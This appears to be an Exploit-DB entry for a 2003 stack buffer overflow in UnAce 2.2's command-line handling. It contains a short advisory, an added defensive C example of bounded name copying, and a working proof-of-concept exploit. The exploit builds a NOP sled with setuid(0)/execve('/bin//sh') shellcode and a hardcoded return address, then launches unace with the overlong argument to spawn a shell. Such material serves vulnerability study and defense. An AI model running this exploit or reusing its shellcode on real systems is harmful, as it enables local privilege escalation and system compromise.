Winace UnAce 2.2 - Command Line Argument Buffer Overflow (1)

EDB-ID: 23368
CVE: N/A
Author: demz
Type: remote
Platform: Linux
Date: 2003-11-10

// source: https://www.securityfocus.com/bid/9002/info

UnAce has been reported to be prone to a buffer overflow vulnerability. The issue occurs when UnAce handles ACE filenames of excessive length. When such a filename is passed to the UnAce utility as a command-line argument, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer overflows its bounds and overwrites any saved data adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the user who is running UnAce.
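The fix for this class of bug is to measure the argument before copying it. The following is an added example, not UnAce's code and not part of the original advisory or PoC: `copy_archive_name()`, `NAME_BUF_SIZE` and the 256-byte size are hypothetical, since the page does not give the real buffer size.

```c
/* Added example: bounded copy of a command-line archive name.
 * NAME_BUF_SIZE and copy_archive_name() are hypothetical; UnAce's real
 * buffer size and source code are not shown on this page. */
#include <stdio.h>
#include <string.h>

#define NAME_BUF_SIZE 256          /* assumed size, for illustration only */

enum { NAME_OK = 0, NAME_BAD_ARG = -1, NAME_TOO_LONG = -2 };

/* The flawed pattern the advisory describes is an unchecked copy such as
 *     strcpy(name, argv[2]);
 * which writes past name[] whenever the argument is longer than the buffer.
 * This version measures the input first and refuses anything that would not
 * fit together with its terminating NUL, instead of truncating silently
 * (a truncated name could address a different file). */
int copy_archive_name(char *dst, size_t dst_size, const char *src)
{
    const char *nul;

    if (dst == NULL || src == NULL || dst_size == 0)
        return NAME_BAD_ARG;

    /* Look for the terminator within the first dst_size bytes only. */
    nul = memchr(src, '\0', dst_size);
    if (nul == NULL) {
        dst[0] = '\0';             /* leave dst as a valid empty string */
        return NAME_TOO_LONG;
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);   /* includes the NUL */
    return NAME_OK;
}

int main(void)
{
    char name[NAME_BUF_SIZE];
    char overlong[712];            /* constructed input: 711 bytes, the PoC's argument length */

    memset(overlong, 'A', sizeof(overlong) - 1);
    overlong[sizeof(overlong) - 1] = '\0';

    printf("normal:   %d\n", copy_archive_name(name, sizeof(name), "backup.ace"));
    printf("overlong: %d\n", copy_archive_name(name, sizeof(name), overlong));
    return 0;
}
```

Rejecting the overlong name with an error, rather than truncating it, keeps the tool from silently operating on a different path than the one the caller supplied.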

/* gEEk-unace.c
 *
 * PoC exploit made for advisory based upon a local stack based overflow.
 * Vulnerable versions, maybe also prior versions:
 *
 * Unace v2.2
 *
 * Tested on:  Debian 3.0
 *
 * Advisory source: MegaHz
 * http://www.securityfocus.com/archive/1/344065/2003-11-07/2003-11-13/0
 *
 * -----------------------------------------
 * coded by: demz (geekz.nl) (demz@geekz.nl)
 * -----------------------------------------
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memset, strlen */
#include <unistd.h>     /* execl */

char shellcode[]=

        "\x31\xc0"                      // xor          eax, eax
        "\x31\xdb"                      // xor          ebx, ebx
        "\x31\xc9"                      // xor          ecx, ecx
        "\xb0\x46"                      // mov          al, 70
        "\xcd\x80"                      // int          0x80

        "\x31\xc0"                      // xor          eax, eax
        "\x50"                          // push         eax
        "\x68\x6e\x2f\x73\x68"          // push  long   0x68732f6e
        "\x68\x2f\x2f\x62\x69"          // push  long   0x69622f2f
        "\x89\xe3"                      // mov          ebx, esp
        "\x50"                          // push         eax
        "\x53"                          // push         ebx
        "\x89\xe1"                      // mov          ecx, esp
        "\x99"                          // cdq
        "\xb0\x0b"                      // mov          al, 11
        "\xcd\x80"                      // int          0x80

        "\x31\xc0"                      // xor          eax, eax
        "\xb0\x01"                      // mov          al, 1
        "\xcd\x80";                     // int          0x80

int main()
{
        unsigned long ret = 0xbfffc260;

        char buffer[712];       /* indices 707..711 are written below */
        int i=0;

        memset(buffer, 0x90, sizeof(buffer));

        for (; i < strlen(shellcode) - 1; i++)
                buffer[300 + i] = shellcode[i];

        buffer[707] = (ret & 0x000000ff);
        buffer[708] = (ret & 0x0000ff00) >> 8;
        buffer[709] = (ret & 0x00ff0000) >> 16;
        buffer[710] = (ret & 0xff000000) >> 24;
        buffer[711] = 0x0;

        printf("\nUnace v2.2 local exploit\n");
        printf("---------------------------------------- demz @ geekz.nl --\n");

        execl("./unace", "unace", "e", buffer, NULL);

        /* execl only returns on failure */
        perror("execl");
        return 1;
}